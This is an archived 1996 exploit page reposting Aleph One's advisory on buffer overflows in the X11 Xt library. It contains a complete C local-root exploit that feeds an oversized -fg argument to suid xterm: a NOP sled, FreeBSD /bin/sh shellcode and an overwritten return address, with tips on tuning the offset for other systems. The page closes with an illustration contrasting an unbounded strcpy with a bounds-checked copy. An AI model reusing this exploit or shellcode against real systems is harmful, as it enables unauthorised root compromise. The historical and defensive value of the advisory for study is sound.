Xt library bug xterm exploit

Summary
Description: The Xt library has a number of buffer overflow vulnerabilities which can be exploited through the suid root programs linked against it.
Author: "b0z0 bra1n"
Compromise: root (local)
Vulnerable Systems: This exploit works on FreeBSD and, with tweaking of the offset, on other x86 operating systems (e.g. Linux). Most systems running any version of X11 prior to August 1996 are vulnerable.
Date: 24 August 1996
Details

Exploit:


From: Aleph One (aleph1@underground.org)
Date: Sat, 24 Aug 1996 02:14:24 -0700 




There exists at least one vulnerability in the Xt library caused by a buffer
overrun that allows arbitrary code to be executed. This vulnerability
exists in the Xt library itself. As such all programs linked with it
that are suid root or can be coerced into running as root are vulnerable.
The standard example is of course suid xterm. The vulnerability has
been confirmed under FreeBSD, Solaris, and as far as we can tell every
single other OS running all revisions of X11.

There exists a large number of places in the Xt library code where buffers
allocated on the stack are handled insecurely other than the one used in the
following exploit. The Xt library is a can of worms.

The original author of this vulnerability is "b0z0 bra1n".

x86 exploit tested under FreeBSD follows. For other x86 operating systems
play around with the offset:

#include <stdio.h>     /* printf */
#include <stdlib.h>    /* malloc, atoi, exit */
#include <string.h>    /* memset, strlen */
#include <unistd.h>    /* execl */

#define DEFAULT_OFFSET          0
#define BUFFER_SIZE             1491

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

int main(int argc, char **argv)
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   /* FreeBSD x86 shellcode that runs /bin/sh */
   char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2"
   "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0"
   "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50" "\xeb\x18"
   "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02"
   "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04";

   int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE;

   if(argc>1)
        ofs=atoi(argv[1]);
   if(argc>2)
        bs=atoi(argv[2]);
   printf("Using offset of esp + %d (%x)\nBuffer size %d\n",
        ofs, get_esp()+ofs, bs);

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, bs-strlen(execshell));
   ptr += bs-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL);
}


Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
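The defect the advisory describes, an option value copied into a fixed-size stack buffer with no bound, shown beside a bounded version that rejects oversized values before copying. This is an added illustration, not Xt's code or the exploit's; RES_MAX, the function names and the 1491-byte sample value (the exploit's BUFFER_SIZE) are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical size of a fixed automatic buffer for one resource value. */
#define RES_MAX 64

/* Length of s, stopping at max so an oversized or unterminated value
 * is never scanned past the bound we are about to copy into. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* The pattern the advisory describes (illustrative, not Xt's real code):
 * an option value such as the argument of -fg is copied into a fixed
 * stack buffer with no length check. A value of RES_MAX bytes or more
 * runs past buf into the saved frame pointer and return address. */
void set_resource_unsafe(const char *value)
{
    char buf[RES_MAX];
    strcpy(buf, value);   /* unbounded copy: this is the overflow */
}

/* Hardened form: measure with a bound first, reject anything that does
 * not fit together with its terminator, then copy exactly that many bytes.
 * Returns 0 if the value was stored, -1 if it was rejected. */
int set_resource_safe(const char *value)
{
    char buf[RES_MAX];
    size_t n = bounded_len(value, RES_MAX);
    if (n == RES_MAX)     /* no terminator inside the buffer: too long */
        return -1;
    memcpy(buf, value, n + 1);
    printf("safe path stored %zu bytes\n", n);
    return 0;
}

int main(void)
{
    /* Constructed sample: the exploit's 1491-byte argument, filled with 'A'. */
    static char big[1491 + 1];
    memset(big, 'A', 1491);
    set_resource_unsafe("red");              /* short value: fits either way */
    printf("short value: %d\n", set_resource_safe("red"));   /* 0 */
    printf("1491-byte value: %d\n", set_resource_safe(big)); /* -1 */
    return 0;
}
```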


This page is part of Fyodor's exploit world.